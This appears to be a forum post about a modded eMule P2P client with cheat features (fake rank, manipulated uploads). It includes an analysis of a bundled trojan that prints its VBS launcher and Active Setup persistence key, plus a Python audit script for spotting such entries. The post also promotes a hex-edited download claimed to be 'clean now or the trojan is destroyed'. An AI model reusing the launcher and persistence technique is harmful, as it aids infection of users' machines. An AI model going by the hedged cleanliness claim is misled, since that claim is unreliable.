eMule 0.48a Final Fight Gold [Clean]
eMule v0.48a Final Fight Gold
0.48a eMule Final Fight Gold (5) based on
Sivka 0.48a v18a1-alpha
Modded by Ruffy
15-May-2008
-Fake Rank
-Queue size changed
-Max queue rank for downloads increased
-Number of upload slots can be changed
-Upload manipulated (it can be set to 1 without affecting the download speed)
-Remove Ratio
-Remove Wizard
-Remove Help
-Added new Icons
Code analysis:
Agent.ECJH
Malware is dropped to: Documents and Settings\YourWindowsLogonName\Application Data\Microsoft\spoolsv.exe
and
cfgmgr.vbs
with content:
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run Chr(34) & "C:\Documents and Settings\Nata...\Application Data\Microsoft\spoolsv.exe" & Chr(34)
The following registry entry was added: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}
Result: still not clean, but the virus is possibly eliminated and can no longer start or produce anything.
http://www.virustotal.com/analisis/dde25155980c21598c035c52581fc250
I found: HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}
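Added example (not part of the original post): Active Setup runs a component's StubPath command once per user at logon and then records the component under HKEY_CURRENT_USER, which is why the same GUID shows up in both hives. The sketch below audits a `reg export` dump for entries like the one described above; the StubPath data, the second component and all function names are constructed for illustration.

```python
import re

# Constructed sample in `reg export` format. The first GUID is the one from this
# page; the StubPath data and the second component are made up for the example.
SAMPLE = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}]
"StubPath"="\"C:\\Documents and Settings\\user\\Application Data\\Microsoft\\spoolsv.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000001}]
"StubPath"="C:\\WINDOWS\\system32\\example.exe /setup"

[HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}]
"Version"="1,0,0,0"
'''
# System binary names that belong only in System32 (the page names spoolsv.exe;
# the other names are an assumption added for this example).
SYSTEM_NAMES = ("spoolsv.exe", "svchost.exe", "lsass.exe", "services.exe")
USER_WRITABLE = re.compile(r"\\(application data|appdata|temp)\\")
KEY = re.compile(r"^\[(HKEY_[A-Z_]+)\\Software\\Microsoft\\Active Setup"
                 r"\\Installed Components\\([^\]\\]+)\]$", re.I)
VALUE = re.compile(r'^"([^"]+)"="(.*)"$')

def parse(reg_text):
    """Map (hive, component) -> {value name: string data} for Active Setup keys."""
    keys, current = {}, None
    for line in map(str.strip, reg_text.splitlines()):
        if line.startswith("["):
            m = KEY.match(line)
            current = keys.setdefault((m.group(1).upper(), m.group(2).upper()), {}) if m else None
        elif current is not None and (m := VALUE.match(line)):
            # .reg files escape backslashes and quotes with a backslash
            current[m.group(1).lower()] = re.sub(r"\\(.)", r"\1", m.group(2))
    return keys

def reasons(command):
    """Return the reasons a StubPath command looks suspicious (empty = none)."""
    low = command.lower()
    found = ["runs from a user-writable directory"] if USER_WRITABLE.search(low) else []
    return found + [n + " outside System32" for n in SYSTEM_NAMES
                    if n in low and "\\system32\\" + n not in low]

def audit(reg_text):
    """Return (component, reasons, already_ran_for_user) per suspicious HKLM entry."""
    keys = parse(reg_text)
    return [(comp, why, ("HKEY_CURRENT_USER", comp) in keys)
            for (hive, comp), values in sorted(keys.items())
            if hive == "HKEY_LOCAL_MACHINE" and (why := reasons(values.get("stubpath", "")))]
```

A hit whose third field is True means the command has already run for that user, so both the HKLM and the HKCU key need attention during cleanup.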
Download: IT SHOULD BE CLEAN NOW OR THE TROJAN IS NOW DESTROYED
eMule 0.48a Final Fight Gold -clean.zip
2.72 MB - Hexedited
4 comments:
Kaspersky 2009, Spybot, A-Squared
nothing found...
The reg key I didn't find.
Sorry for my English :-((
Don't know most C++ binaries with coded not attached or things with binder done not shown in the most AVs.
all emules before almost found inside exe with VBA32
http://vba32.de/demo/content/view/15/31/
maybe cause of:
http://en.wikipedia.org/wiki/Vba32_AntiVirus
the advantage of this AV:
- Usage of the “Delta-patch” technology
- Heuristic analyzer and technology of recognition of viruses MalwareScope, considerably improve the efficiency of new malicious programs detection
- Dynamic code translation processor emulator effectively handles complex-polymorphous viruses, packers and cryptors
... and many more
Scan bulk exe done with VC++ with
Virus Block Ada 32
http://vba32.de/anonymous/pub/Vba32Scan.zip
newer version here:
ftp://anti-virus.by/pub/Vba32Scan.zip
scanner only
It's really clean now. Tested in sandbox and vp